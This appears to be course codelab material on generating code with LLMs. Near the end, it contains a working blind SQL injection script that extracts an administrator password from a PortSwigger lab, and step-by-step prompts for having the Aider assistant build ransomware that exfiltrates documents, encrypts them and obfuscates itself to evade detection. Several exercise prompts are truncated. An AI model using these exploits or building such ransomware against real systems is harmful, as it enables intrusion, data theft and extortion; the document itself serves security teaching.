In this week's exercises, your group will try out the various tasks for code generation using LLMs. Begin by completing the initial parts of the codelab. Then, attempt the exercise your group has been assigned in the following Google Slide presentation:
Add screenshots that you can use to walk through how you performed the exercise. Your group will present its results for the exercise during the last hour of class. After completing the exercise you've been assigned, continue with the rest of the exercises in order to prepare for the week's homework assignment.
Code generation is one of the more useful tasks a model can do. However, it is difficult to trust the code it produces without having an idea of what a correct version of the code looks like. In this exercise, a simple Python class that implements a username-password authentication function using a SQLite3 database is shown. Within the class:
A connection to the database file 'users.db' is opened within the class constructor.
The initializeUsers() method of the class creates the users table with text fields: username and password. It then calls the addUser() method to add the admin username with the password of 'password123'.
An addUser() method is implemented that takes a username and a password and inserts them into the database if the username does not exist in the database.
A checkUser() method is implemented that takes a username and password, retrieves the password for the username from the database, then checks it against the given password. The method returns True if they match, False otherwise.
import sqlite3
DB_FILE = 'users.db' # file for our Database

class Users():
    def __init__(self):
        self.connection = sqlite3.connect(DB_FILE)
        cursor = self.connection.cursor()
        try:
            cursor.execute("select count(rowid) from users")
        except sqlite3.OperationalError:
            self.initializeUsers()

    def initializeUsers(self):
        cursor = self.connection.cursor()
        cursor.execute("create table users (username text, password text)")
        self.addUser('admin','password123')

    def addUser(self, username, password):
        cursor = self.connection.cursor()
        params = {'username':username}
        cursor.execute("SELECT username FROM users WHERE username=(:username)", params)
        res = cursor.fetchall()
        if len(res) == 0:
            params = {'username':username, 'password':password}
            cursor.execute("insert into users (username, password) VALUES (:username, :password)", params)
            self.connection.commit()
            return True
        else:
            return False

    def checkUser(self, username, password):
        params = {'username':username}
        cursor = self.connection.cursor()
        cursor.execute("select password from users WHERE username=(:username)", params)
        res = cursor.fetchall()
        if len(res) != 0:
            password_from_db = res.pop()[0]
            if password == password_from_db:
                return True
        return False
The goal of the exercise is to generate a prompt that allows an LLM to produce
Unit tests that are built into a program allow one to catch code changes that may break the functionality of the application. For example, consider the code below that implements a square root.
import math

def square_root(n):
    # Zero is accepted, so the error message says "non-negative"
    if isinstance(n, int) and n >= 0:
        return math.sqrt(n)
    else:
        raise ValueError("Input must be a non-negative integer.")
To add unit tests to this code, one could utilize the unittest package in Python and add assertions that should hold on a variety of test cases. An example is shown below.
import unittest

class TestSquareRoot(unittest.TestCase):
    def test_zero(self):
        self.assertEqual(square_root(0), 0.0)

    def test_non_integer(self):
        with self.assertRaises(ValueError):
            square_root(4.5)
        with self.assertRaises(ValueError):
            square_root("string")
        with self.assertRaises(ValueError):
            square_root([4])

    def test_negative_integer(self):
        with self.assertRaises(ValueError):
            square_root(-1)

if __name__ == "__main__":
    unittest.main()
For our password authentication example, we wish to test the expected behavior of the code across a variety of tests to ensure correctness. For example, the code should:
'password123'
While one could generate these tests manually, an LLM may be able to generate them instead.
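As a point of comparison for whatever an LLM generates, here is a minimal hand-written sketch of what such tests might look like. To stay self-contained, it includes a condensed stand-in for the Users class. The db_file constructor parameter and the test names are assumptions added for illustration, so that each test can run against a throwaway database file instead of users.db.

```python
import os
import sqlite3
import tempfile
import unittest


class Users:
    """Condensed stand-in for the Users class shown earlier.

    Assumption: the constructor takes a db_file path so tests can use a
    temporary database; the original reads the DB_FILE constant instead.
    """

    def __init__(self, db_file):
        self.connection = sqlite3.connect(db_file)
        cursor = self.connection.cursor()
        try:
            cursor.execute("select count(rowid) from users")
        except sqlite3.OperationalError:
            # Table does not exist yet: create it and add the default user.
            cursor.execute("create table users (username text, password text)")
            self.addUser('admin', 'password123')

    def addUser(self, username, password):
        cursor = self.connection.cursor()
        cursor.execute("select username from users where username=?", (username,))
        if cursor.fetchall():
            return False
        cursor.execute("insert into users (username, password) values (?, ?)",
                       (username, password))
        self.connection.commit()
        return True

    def checkUser(self, username, password):
        cursor = self.connection.cursor()
        cursor.execute("select password from users where username=?", (username,))
        row = cursor.fetchone()
        return row is not None and row[0] == password


class TestUsers(unittest.TestCase):
    def setUp(self):
        # Fresh database file per test so tests cannot affect each other.
        self.tmpdir = tempfile.TemporaryDirectory()
        self.users = Users(os.path.join(self.tmpdir.name, 'users.db'))

    def tearDown(self):
        self.users.connection.close()
        self.tmpdir.cleanup()

    def test_default_admin(self):
        self.assertTrue(self.users.checkUser('admin', 'password123'))

    def test_wrong_password(self):
        self.assertFalse(self.users.checkUser('admin', 'wrong'))

    def test_unknown_user(self):
        self.assertFalse(self.users.checkUser('nobody', 'password123'))

    def test_duplicate_user_rejected(self):
        self.assertTrue(self.users.addUser('alice', 'secret'))
        self.assertFalse(self.users.addUser('alice', 'other'))
        self.assertTrue(self.users.checkUser('alice', 'secret'))
```

Running the file with python -m unittest executes the four tests. Comparing them against LLM-generated tests is one way to spot cases the model missed.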
Python 3.5 and later support type annotations, which give the developer the ability to reason about data types within their programs. Adding type annotations to code written without them is something that can potentially be automated by an LLM. Consider the code below that fetches a URL using the requests package, parses the page using BeautifulSoup, and then returns the text of the page's <title> tag if it exists.
import requests
from bs4 import BeautifulSoup

def getUrlTitle(url):
    resp = requests.get(url)
    title_tag = BeautifulSoup(resp.text, 'html.parser').find('title')
    if title_tag and title_tag.text:
        return title_tag.text.strip()
    else:
        return None
A fully annotated version is shown below with each parameter and return value assigned a type, along with any variable that has been utilized. In addition, the Optional type is used when the return type can be either the given type (e.g. str) or None.
import requests
from bs4 import BeautifulSoup, Tag
from typing import Optional

def getUrlTitle(url: str) -> Optional[str]:
    resp: requests.Response = requests.get(url)
    resp.raise_for_status()
    soup: BeautifulSoup = BeautifulSoup(resp.text, 'html.parser')
    # Tag is imported from bs4; BeautifulSoup has no Tag attribute
    title_tag: Optional[Tag] = soup.find('title')
    if title_tag and title_tag.text:
        return title_tag.text.strip()
    else:
        return None
With the code given previously for the password authentication program
One of the potential uses for a code-based LLM is to take existing code and implement new functionality. Consider the code below that sequentially downloads URLs and pulls out their <title> tags.
import requests
from bs4 import BeautifulSoup

def getUrlTitle(url):
    resp = requests.get(url)
    title_tag = BeautifulSoup(resp.text, 'html.parser').find('title')
    ...

def getSequential(urls):
    titles = []
    for u in urls:
        titles.append(getUrlTitle(u))
    return titles

urls = ['https://pdx.edu', 'https://oregonctf.org']
print(getSequential(urls))
Using an LLM, one can convert the code to use asynchronous calls, as shown below.
import asyncio
import aiohttp
from bs4 import BeautifulSoup

async def getUrlTitle(session, url):
    async with session.get(url) as resp:
        html = await resp.text()
        title_tag = BeautifulSoup(html, 'html.parser').find('title')
        ...

async def getAsync(urls):
    async with aiohttp.ClientSession() as session:
        # Start all downloads, then wait for them to finish together
        tasks = [getUrlTitle(session, url) for url in urls]
        titles = await asyncio.gather(*tasks)
    return titles

print(asyncio.run(getAsync(['https://pdx.edu', 'https://oregonctf.org'])))
The prior password program stores cleartext passwords instead of password hashes. If the system were compromised, the cleartext passwords of every user would be exposed, allowing an adversary to perform credential stuffing. Given the original password code:
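As background for this exercise, the following is a minimal sketch of salted password hashing using only the Python standard library. It is one possible approach and not the expected answer: the helper names hash_password and verify_password, the choice of PBKDF2-HMAC-SHA256, and the iteration count are all assumptions made for illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumed work factor; tune for your hardware


def hash_password(password, salt=None):
    """Return (salt, digest) for a password using PBKDF2-HMAC-SHA256."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt for each stored password
    digest = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'),
                                 salt, ITERATIONS)
    return salt, digest


def verify_password(password, salt, expected_digest):
    """Recompute the digest with the stored salt and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected_digest)


salt, digest = hash_password('password123')
print(verify_password('password123', salt, digest))  # True
print(verify_password('letmein', salt, digest))      # False
```

With a scheme like this, the database would store the salt and digest rather than the password, so a compromise does not directly reveal what users typed.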
LLMs have been successfully used to translate text from one language to another. Since programming languages are just another type of language, one potential use for LLMs is to automatically translate a program to another programming language.
In this exercise, we'll translate our original password code written in Python into JavaScript. We'll begin by asking an LLM to create a JavaScript equivalent for the password program. As part of the prompt, give the LLM some additional instructions to guide its translation such as:
sqlite3 module
Using the above as a guide,
To run the code, bring up the course VM and install the latest Node.js version.
sudo apt update -y
sudo apt install nodejs npm -y
sudo npm install -g n
sudo n stable
hash -r
Create a directory to run the application from, and install the JavaScript packages that are required.
mkdir js
cd js
npm install sqlite3
Copy the code the LLM produced into the file users.js. Then, run the code.
node users.js
We'll attempt to repeat the exercise using TypeScript instead.
Install the ts-node package.
npm install ts-node
Copy the code the LLM produced into the file users.ts. Then, run the npx command to transpile the code to JavaScript and execute it.
npx ts-node users.ts
LLMs can be used to speed up the process of exploit development. Open the PortSwigger level https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses. After reading the lab description and the hint, click the "Access the lab" button. The level has a SQL injection vulnerability in its tracking cookie (TrackingId) that allows one to exfiltrate the password for the administrator account programmatically. The code below performs a brute-force linear search on each character of the password in order to solve the level.
import requests
from bs4 import BeautifulSoup
import time
import urllib.parse

def test_string(url, prefix, letter):
    query = f"x' union select 'a' from users where username = 'administrator' and password ~ '^{prefix}{letter}'--"
    print(f'Testing ^{prefix}{letter}')
    mycookies = {'TrackingId': urllib.parse.quote_plus(query)}
    resp = requests.get(url, cookies=mycookies)
    soup = BeautifulSoup(resp.text, 'html.parser')
    if soup.find('div', text='Welcome back!'):
        print(f'Found character {letter}')
        return True
    else:
        return False

site = ''
url = f'https://{site}/'
start_alpha = 'abcdefghijklmnopqrstuvwxyz0123456789'
prefix = ''
begin_time = time.perf_counter()
while True:
    if test_string(url, prefix, '$'):
        break
    for letter in start_alpha:
        check = test_string(url, prefix, letter)
        if check:
            prefix += letter
            break
print(f'Password is {prefix}')
print(f"Time elapsed is {time.perf_counter()-begin_time}")
As part of the homework assignment, students create a version of the prior program that performs a binary search instead of a linear search, thus reducing the number of requests needed to find each character of the password from O(n), where n is the number of characters in the character set, to O(log n). For example, the following injection utilizes the ~ operator in SQL to perform a regular expression search on the first letter of the administrator's password.
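import string
charset = string.ascii_lowercase + string.digits
mid = len(charset) // 2  # illustrative midpoint; tests the first half of the character set
query = f"""x' UNION SELECT username from users where username = 'administrator' and password ~ '^[{charset[:mid]}]' --"""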
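The per-character binary search described above can be sketched offline. In this sketch, a local regular-expression check stands in for the injected query, so no requests are sent. The names make_oracle, next_char, and recover and the sample secret are hypothetical, and the secret is assumed to contain only characters from the character set.

```python
import re
import string

CHARSET = string.ascii_lowercase + string.digits


def make_oracle(secret):
    """Local stand-in for the injected query: True if the regex matches."""
    calls = {'count': 0}

    def oracle(pattern):
        calls['count'] += 1
        return re.search(pattern, secret) is not None

    return oracle, calls


def next_char(oracle, prefix):
    """Binary search CHARSET for the character that follows prefix."""
    lo, hi = 0, len(CHARSET)  # candidates are CHARSET[lo:hi]
    while hi - lo > 1:
        mid = (lo + hi) // 2
        # Is the next character in the lower half of the candidates?
        if oracle(f'^{prefix}[{CHARSET[lo:mid]}]'):
            hi = mid
        else:
            lo = mid
    return CHARSET[lo]


def recover(oracle):
    """Extend the known prefix until the whole string matches."""
    prefix = ''
    while not oracle(f'^{prefix}$'):
        prefix += next_char(oracle, prefix)
    return prefix


oracle, calls = make_oracle('s3cr3tpw')
print(recover(oracle), calls['count'])
```

Each character costs at most six oracle calls for the 36-character set, plus one end-of-string check, compared with up to 36 calls per character for the linear search.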
Using the linear search program and instructing the LLM to generate a program that implements a binary search algorithm per character using the ~ operator,
Another task an LLM may help with is to generate regular expressions based on strings that a user supplies. Consider the strings below that are used to polymorph the User-Agent: HTTP header in an attempt to evade detection. Filtering software could be configured with a single regular expression that covers all of these strings.
We4b58
We7d7f
Wea4ee
We70d3
Wea508
We6853
We3d97
We8d3a
Web1a7
Wed0d1
We93d0
Wec697
We5186
We90d8
We9753
We3e18
We4e8f
We8f1a
Wead29
Wea76b
Wee716
Query the LLM to see if it is able to generate a Python regular expression that matches all of the strings above. Then visit https://regex101.com/ to validate the expression against the data provided.
There are limits to how accurately a model can perform this task. Repeat the task, but insert strings that can cause the LLM to produce an incorrect result.
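Besides regex101, a candidate expression can be checked locally with Python's re module. The sketch below tests one plausible pattern against the strings listed above. The pattern itself is an assumption for illustration (the literal prefix "We" followed by four lowercase hexadecimal digits), not the expected answer.

```python
import re

samples = """We4b58 We7d7f Wea4ee We70d3 Wea508 We6853 We3d97
We8d3a Web1a7 Wed0d1 We93d0 Wec697 We5186 We90d8
We9753 We3e18 We4e8f We8f1a Wead29 Wea76b Wee716""".split()

# Candidate pattern (an assumption): "We" plus exactly four lowercase hex digits.
pattern = re.compile(r'We[0-9a-f]{4}')

# fullmatch requires the whole string to match, not just a prefix.
misses = [s for s in samples if not pattern.fullmatch(s)]
print(f'{len(samples)} samples, {len(misses)} not matched: {misses}')

# A string outside the observed shape should be rejected.
print(pattern.fullmatch('Webkit'))
```

Replacing the pattern with the LLM's answer and adding a few strings that should not match gives a quick check for expressions that are too broad or too narrow.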
When an application takes input controlled by an end user and uses it within the application, the input must either be properly encoded (where sensitive characters are converted into innocuous ones) or filtered (where sensitive characters are simply removed). Without doing so, attacks such as command injection, SQL injection, and cross-site scripting (XSS) can occur. In this exercise, we will examine an LLM's ability to produce code that performs appropriate encoding and filtering.
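The difference between encoding and filtering can be illustrated with a few standard library calls. This is a minimal sketch: the sample input and the allow-list used for filtering are assumptions chosen for illustration, and which call is appropriate depends on where the input ends up.

```python
import html
import re
import shlex
from urllib.parse import quote

user_input = "<b>Tom & 'Jerry'</b>; ls"

# Encoding: sensitive characters are converted, nothing is lost.
as_html = html.escape(user_input)     # for HTML text or attribute values
as_url = quote(user_input, safe='')   # for a URL query parameter value
as_shell = shlex.quote(user_input)    # for a single POSIX shell argument

# Filtering: anything outside an allow-list is removed.
# The allow-list (letters, digits, space) is an illustrative assumption.
filtered = re.sub(r'[^A-Za-z0-9 ]', '', user_input)

print(as_html)
print(as_url)
print(as_shell)
print(filtered)
```

Encoded values can be decoded back to the original input by the consumer, while filtered values cannot. That is one reason encoding is often preferred when the original text matters.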
The algorithm that should be applied depends on the context in which the input is used in the application, leading the developer to encode different characters based on where the input is consumed. In this exercise, consider a string named user_input whose value is given by the user. Prompt an LLM to generate Python code that encodes user_input so it can be:
f'')
f'https://foo.com/?name={user_input}')
Another approach to sanitizing input is to filter sensitive characters completely. Similar to before, prompt an LLM to generate Python code that filters user_input so that it can be:
f'')
f'https://foo.com/?name={user_input}')
Because of the ability of modern LLMs to produce code, there are many tools that help integrate their use in the development process. For example, GitHub Copilot is often utilized within VS Code to provide in-line code generation within a developer's coding environment. Another such tool is Aider: a software engineering assistant that provides a pair programming experience with an LLM. Developers interact with Aider via a command line interface. Two of Aider's features that make it useful are its use of local git repos for better control over code modifications and its use of Tree Sitter, a program that parses code and builds concrete syntax trees. In this exercise, Aider will be used to assist in the incremental development of a ransomware/leakware program that scans the file system for PDFs and Microsoft Word documents, saves them in a zip file, uploads the zip file to a web server, encrypts the zip file using a key, and then deletes the original files.
Use the web console to bring up an ssh session on your virtual machine. We'll need multiple ssh sessions on our VM to perform the lab. To support multiple sessions in a single terminal, we can utilize tmux: a terminal multiplexer. tmux utilizes keyboard shortcuts that are triggered after hitting Ctrl+b to navigate multiple terminals within a single window. To start a tmux session, run it in the terminal.
tmux
To create a new terminal, press Ctrl+b followed by c.
As can be seen by the lower tabs on the screen, there are now two multiplexed terminals active. You can now switch between them by pressing Ctrl+b followed by the terminal number you want to switch to (e.g. 0 or 1).
tmux session
Use the web console to bring up an ssh session on your virtual machine. Change into the source directory containing the examples, create a virtual environment, activate it, and install the packages.
cd cs410g-src/08*
git pull
virtualenv -p python3 env
source env/bin/activate
pip install -r requirements.txt
Then, run the web application in the directory. This application runs a simple upload server that your generated program will upload files to.
python3 simple_http_server.py
Iconify the ssh window as you complete the rest of the exercise.
tmux session
Create a new terminal using Ctrl+b followed by c.
Create a directory for your application, then create a virtual environment with Aider installed in it.
mkdir -p ~/Aider/malware
cd ~/Aider/malware
python3 -m venv env
source env/bin/activate
pip install aider-chat
We'll now need to set up an environment variable named GEMINI_API_KEY that contains the same value as the GOOGLE_API_KEY you have set previously. Note that Aider also supports OpenAI, Anthropic, and other providers.
export GEMINI_API_KEY=$GOOGLE_API_KEY
Finally, launch Aider:
aider --model gemini/gemini-1.5-pro-latest
Note that if you want to select other models, you can also use the /models command once the Aider chat has started and change the model partway through. Aider also has a handy help menu if you wish to explore. To view it, type the following into the chat:
/help
/help: View helpful commands
/test: Run a command line command and automatically include the output if it returns an error
/run: Run a command line command and optionally choose to add it to chat
/clear: Clear the chat tokens. This will unclutter the chat space of your previous messages
/drop: Remove files matching the search string; defaults to all files if no string is given
/add: Add a file to the chat context
/tokens: Report the number of tokens used in the current chat context
/diff: Display the diff of the last Aider commit
/undo: Undo the last commit if it was made by Aider
/ls: List current files in chat context
/exit: Exit the current Aider session
Now it is time to have Aider make the first git commit:
find_pdfs that takes a directory as an argument and searches for PDFs in the local file system"
Check that the code was committed:
/diff
(Note: If the /diff command produces an error, start Aider again with the same model. Then use /add find_pdfs.py to add the created file back into Aider's context. Then use /git add find_pdfs.py to track the file.)
Now that it has been verified that Aider made a local commit, it would be nice to have a way to test the function that Aider created.
find_pdfs.py file that runs the find_pdfs function and prints the files it finds. It should take a command line argument for the directory."
/drop command to remove the file from the context and retry the same prompt above.
/diff to check what Aider produced
Aider allows developers to run shell commands within an Aider session. This example will use this feature to test the script that was written. First, find where the course directory is located using the /run command and ls. Then run the script using the directory that was found.
/run ls ~
/run python find_pdfs.py ~/cs410g-src
python_cheat_sheet.pdf and msSecurity-compressed-extracted.pdf
To efficiently load the files off the system, it is necessary to compress them.
create_pdf_zip that creates a zip file of all the pdf files returned by find_pdfs and save it to /tmp/foo.zip. The function should be called when executing the Python script"
/diff to make sure the code looks correct
To test that the file is being created in the correct location, Aider can be used to make unit tests:
find_pdfs file, make a new file that contains unit tests for both the create_pdf_zip and find_pdfs function."
/diff to see what file it made
The next step for a data ransomware campaign might be to exfiltrate the files from the target system to a server that the adversary controls. Modify the current project using Aider to add this functionality.
create_pdf_zip function and upload it to http://127.0.0.1:5000/upload using an HTTP POST request. The endpoint accepts file objects. Use the Python requests package."
/diff to check that it looks correct
Now test the script that Aider wrote by using the /test command. This will add the output to the chat:
/test python find_pdfs.py <course home directory>
A ransomware payload would want to make the exfiltrated files unusable to the target so that the target administrators are forced to pay a ransom in order to decrypt their files. This could be done using either asymmetric or symmetric encryption. This exercise will use symmetric encryption so that the encryption key and decryption key are the same.
create_pdf_zip function so that it will use the Python cryptography package to encrypt the contents of the zip file and save it as /tmp/foo.zip.enc. Send the encrypted file as a post request to http://127.0.0.1:5000/upload. Then send the encryption key as a post request to http://127.0.0.1:5000/upload as a file called key"
requirements.txt file that contains the necessary Python packages to run the script"
Install the dependencies (e.g. do not add them to the chat), and run the script:
/run pip install -r requirements.txt
/test python find_pdfs.py ~/cs410g-src
foo.zip file and a key file in the uploads directory
foo.zip.enc is present in the /tmp directory
To make the ransomware harder to detect, it can be useful to create variants of the code that have identical functionality.
find_pdfs so that the function call strings are encoded using base64 and the code is still identical in functionality."